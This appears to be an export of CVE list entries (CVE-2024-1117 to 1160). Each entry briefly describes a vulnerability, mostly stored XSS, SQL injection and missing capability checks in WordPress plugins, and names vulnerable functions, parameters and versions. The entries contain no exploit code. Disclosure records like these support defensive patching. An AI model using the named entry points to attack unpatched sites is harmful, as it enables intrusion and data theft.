CVE    2024    1160    Candidate    The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Link in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve    Assigned (20240201)
CVE    2024    1159    Candidate    The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve    Assigned (20240201)
CVE    2024    1158    Candidate    The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buddyforms_new_page function in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber access or higher, to create pages with arbitrary titles. These pages are published.    MISC:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/admin/admin-ajax.php?rev=2820257#L80   |   URL:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/admin/admin-ajax.php?rev=2820257#L80   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve    Assigned (20240201)
CVE    2024    1157    Candidate    The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button URL in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/bold-page-builder/trunk/content_elements/bt_bb_button/bt_bb_button.php#L161   |   URL:https://plugins.trac.wordpress.org/browser/bold-page-builder/trunk/content_elements/bt_bb_button/bt_bb_button.php#L161   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve    Assigned (20240201)
CVE    2024    1156    Candidate    Incorrect directory permissions for the shared NI RabbitMQ service may allow a local authenticated user to read RabbitMQ configuration information and potentially enable escalation of privileges.    MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html   |   URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html    Assigned (20240201)
CVE    2024    1155    Candidate    Incorrect permissions in the installation directories for shared SystemLink Elixir based services may allow an authenticated user to potentially enable escalation of privilege via local access.    MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html   |   URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html    Assigned (20240201)
CVE    2024    1151    Candidate    A vulnerability was reported in the Open vSwitch sub-component in the Linux Kernel. The flaw occurs when a recursive operation of code push recursively calls into the code block. The OVS module does not validate the stack depth, pushing too many frames and causing a stack overflow. As a result, this can lead to a crash or other related issues.    FEDORA:FEDORA-2024-88847bc77a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GS7S3XLTLOUKBXV67LLFZWB3YVFJZHRK/   |   FEDORA:FEDORA-2024-987089eca2   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3LZROQAX7Q7LEP4F7WQ3KUZKWCZGFFP2/   |   MISC:RHBZ#2262241   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2262241   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1151   |   URL:https://access.redhat.com/security/cve/CVE-2024-1151   |   MISC:https://lore.kernel.org/all/20240207132416.1488485-1-aconole@redhat.com/   |   URL:https://lore.kernel.org/all/20240207132416.1488485-1-aconole@redhat.com/    Assigned (20240201)
CVE    2024    1150    Candidate    Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages. This issue affects Inventory Agent: through 7.3.1.    MISC:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK   |   URL:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK    Assigned (20240201)
CVE    2024    1149    Candidate    Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on MacOS, Snow Software Inventory Agent on Windows, Snow Software Inventory Agent on Linux allows File Manipulation through Snow Update Packages. This issue affects Inventory Agent: through 6.12.0; Inventory Agent: through 6.14.5; Inventory Agent: through 6.7.2.    MISC:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK   |   URL:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK    Assigned (20240201)
CVE    2024    1148    Candidate    Weak access control in OpenText PVCS Version Manager allows potential bypassing of authentication and uploading of files.    MISC:https://portal.microfocus.com/s/article/KM000026669   |   URL:https://portal.microfocus.com/s/article/KM000026669    Assigned (20240201)
CVE    2024    1147    Candidate    Weak access control in OpenText PVCS Version Manager allows potential bypassing of authentication and download of files.    MISC:https://portal.microfocus.com/s/article/KM000026669   |   URL:https://portal.microfocus.com/s/article/KM000026669    Assigned (20240201)
CVE    2024    1146    Candidate    Cross-Site Scripting vulnerability in Devklan's Alma Blog that affects versions 2.1.10 and earlier. This vulnerability could allow an attacker to store a malicious JavaScript payload within the application by adding the payload to 'Community Description' or 'Community Rules'.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog    Assigned (20240201)
CVE    2024    1145    Candidate    User enumeration vulnerability in Devklan's Alma Blog that affects versions 2.1.10 and earlier. This vulnerability could allow a remote user to retrieve all valid users registered in the application just by looking at the request response.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog    Assigned (20240201)
CVE    2024    1144    Candidate    Improper access control vulnerability in Devklan's Alma Blog that affects versions 2.1.10 and earlier. This vulnerability could allow an unauthenticated user to access the application's functionalities without the need for credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog    Assigned (20240201)
CVE    2024    1143    Candidate    Central Dogma versions prior to 0.64.1 are vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass.    MISC:https://github.com/line/centraldogma/security/advisories/GHSA-34q3-p352-c7q8   |   URL:https://github.com/line/centraldogma/security/advisories/GHSA-34q3-p352-c7q8    Assigned (20240201)
CVE    2024    1142    Candidate    Path Traversal in Sonatype IQ Server from version 143 allows remote authenticated attackers to overwrite or delete files via a specially crafted request. Version 171 fixes this issue.    MISC:https://support.sonatype.com/hc/en-us/articles/27034479038739-CVE-2024-1142-Sonatype-IQ-Server-Path-Traversal-2024-03-06   |   URL:https://support.sonatype.com/hc/en-us/articles/27034479038739-CVE-2024-1142-Sonatype-IQ-Server-Path-Traversal-2024-03-06    Assigned (20240201)
CVE    2024    1141    Candidate    A vulnerability was found in python-glance-store. The issue occurs when the package logs the access_key for the glance-store when the DEBUG log level is enabled.    MISC:RHBZ#2258836   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258836   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1141   |   URL:https://access.redhat.com/security/cve/CVE-2024-1141    Assigned (20240201)
CVE    2024    1140    Candidate    Twister Antivirus v8.17 is vulnerable to an Out-of-bounds Read vulnerability by triggering the 0x801120B8 IOCTL code of the filmfd.sys driver.    MISC:http://www.filseclab.com/en-us/products/twister.htm   |   URL:http://www.filseclab.com/en-us/products/twister.htm   |   MISC:https://fluidattacks.com/advisories/fitzgerald/   |   URL:https://fluidattacks.com/advisories/fitzgerald/    Assigned (20240131)
CVE    2024    1138    Candidate    The FTL Server component of TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition contains a vulnerability that allows a low privileged attacker with network access to execute a privilege escalation on the affected ftlserver. Affected releases are TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition: versions 6.10.1 and below.    MISC:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-ftl-cve-2024-1138-r207/   |   URL:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-ftl-cve-2024-1138-r207/    Assigned (20240131)
CVE    2024    1137    Candidate    The Proxy and Client components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition contain a vulnerability that theoretically allows an Active Spaces client to passively observe data traffic to other clients. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition: versions 4.4.0 through 4.9.0.    MISC:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-activespaces-cve-2024-1137-r208/   |   URL:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-activespaces-cve-2024-1137-r208/    Assigned (20240131)
CVE    2024    1136    Candidate    The Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to unauthorized access of data due to an improperly implemented URL check in the wpsm_coming_soon_redirect function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to view the content of a site that has maintenance mode or coming-soon mode enabled.    MISC:https://plugins.trac.wordpress.org/browser/responsive-coming-soon/trunk/redirect.php#L11   |   URL:https://plugins.trac.wordpress.org/browser/responsive-coming-soon/trunk/redirect.php#L11   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve    Assigned (20240131)
CVE    2024    1133    Candidate    The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of restricted Q&A content due to a missing capability check when interacting with questions in all versions up to, and including, 2.6.0. This makes it possible for authenticated attackers, with subscriber access or higher, to interact with questions in courses in which they are not enrolled including private courses.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037911%40tutor%2Ftrunk&old=3020286%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file12   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e8a7c04a-1fa0-434d-8161-7a32cefb44c4?source=cve    Assigned (20240131)
CVE    2024    1130    Candidate    The NEX-Forms – Ultimate Form Builder – Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_read() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as read.    MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2c3b646-d865-4425-bc8f-00b3555a3d74?source=cve    Assigned (20240131)
CVE    2024    1129    Candidate    The NEX-Forms – Ultimate Form Builder – Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_starred() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as starred.    MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve    Assigned (20240131)
CVE    2024    1128    Candidate    The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 2.6.0. This is due to insufficient sanitization of HTML input in the Q&A functionality. This makes it possible for authenticated attackers, with Student access and above, to inject arbitrary HTML onto a site, though it does not allow Cross-Site Scripting.    MISC:https://plugins.trac.wordpress.org/changeset/3037911/tutor/tags/2.6.1/classes/Q_and_A.php?old=2827221&old_path=tutor/trunk/classes/Q_and_A.php   |   URL:https://plugins.trac.wordpress.org/changeset/3037911/tutor/tags/2.6.1/classes/Q_and_A.php?old=2827221&old_path=tutor/trunk/classes/Q_and_A.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve    Assigned (20240131)
CVE    2024    1127    Candidate    The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the booking_export_all() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve all event bookings, which can contain PII.    MISC:https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk//includes/service/class-ep-ajax.php#L1994   |   URL:https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk//includes/service/class-ep-ajax.php#L1994   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/39da62be-e630-48cd-b732-80ed3d337638?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/39da62be-e630-48cd-b732-80ed3d337638?source=cve    Assigned (20240131)
CVE    2024    1126    Candidate    The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_attendees_email_by_event_id() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve the attendees list for any event.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve    Assigned (20240131)
CVE    2024    1125    Candidate    The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the calendar_events_delete() function in all versions up to, and including, 3.4.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve    Assigned (20240131)
CVE    2024    1124    Candidate    The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the ep_send_attendees_email() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to send arbitrary emails with arbitrary content from the site.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve    Assigned (20240131)
CVE    2024    1123    Candidate    The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_frontend_event_submission() function in all versions up to, and including, 3.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the title and content of arbitrary posts. This can also be exploited by unauthenticated attackers when the allow_submission_by_anonymous_user setting is enabled.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve    Assigned (20240131)
CVE    2024    1122    Candidate    The Event Manager, Events Calendar, Events Tickets for WooCommerce – Eventin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_data() function in all versions up to, and including, 3.3.50. This makes it possible for unauthenticated attackers to export event data.    MISC:https://plugins.trac.wordpress.org/changeset/3033231/wp-event-solution/tags/3.3.51/core/admin/hooks.php   |   URL:https://plugins.trac.wordpress.org/changeset/3033231/wp-event-solution/tags/3.3.51/core/admin/hooks.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve    Assigned (20240131)
CVE    2024    1121    Candidate    The Advanced Forms for ACF plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_json_file() function in all versions up to, and including, 1.9.3.2. This makes it possible for unauthenticated attackers to export form settings.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve    Assigned (20240131)
CVE    2024    1120    Candidate    The NextMove Lite – Thank You Page for WooCommerce and Finale Lite – Sales Countdown Timer & Discount for WooCommerce plugins for WordPress are vulnerable to unauthorized access of data due to a missing capability check on the download_tools_settings() function in all versions up to, and including, 2.17.0. This makes it possible for unauthenticated attackers to export system information that can aid attackers in an attack.    MISC:https://plugins.trac.wordpress.org/browser/finale-woocommerce-sales-countdown-timer-discount/trunk/includes/wcct-xl-support.php#L710   |   URL:https://plugins.trac.wordpress.org/browser/finale-woocommerce-sales-countdown-timer-discount/trunk/includes/wcct-xl-support.php#L710   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve    Assigned (20240131)
CVE    2024    1119    Candidate    The Order Tip for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_tips_to_csv() function in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to export the plugin's order fees.    MISC:https://plugins.trac.wordpress.org/browser/order-tip-woo/trunk/admin/controllers/reports.class.php#L359   |   URL:https://plugins.trac.wordpress.org/browser/order-tip-woo/trunk/admin/controllers/reports.class.php#L359   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052259%40order-tip-woo&new=3052259%40order-tip-woo&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f837d6b-d1fa-4019-892a-dca3c0f29ca7?source=cve    Assigned (20240131)
CVE    2024    1118    Candidate    The Podlove Subscribe button plugin for WordPress is vulnerable to UNION-based SQL Injection via the 'button' attribute of the podlove-subscribe-button shortcode in all versions up to, and including, 1.3.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://github.com/podlove/podlove-subscribe-button-wp-plugin/commit/b16b7a2e98db4c642ca671b0aede4dbfce4578b3   |   URL:https://github.com/podlove/podlove-subscribe-button-wp-plugin/commit/b16b7a2e98db4c642ca671b0aede4dbfce4578b3   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve    Assigned (20240131)
CVE    2024    1117    Candidate    A vulnerability was found in openBI up to 1.0.8. It has been declared as critical. Affected by this vulnerability is the function index of the file /application/index/controller/Screen.php. The manipulation of the argument fileurl leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252475.    MISC:https://note.zhaoj.in/share/Liu1nbjddxu4   |   URL:https://note.zhaoj.in/share/Liu1nbjddxu4   |   MISC:https://vuldb.com/?ctiid.252475   |   URL:https://vuldb.com/?ctiid.252475   |   MISC:https://vuldb.com/?id.252475   |   URL:https://vuldb.com/?id.252475    Assigned (20240131)
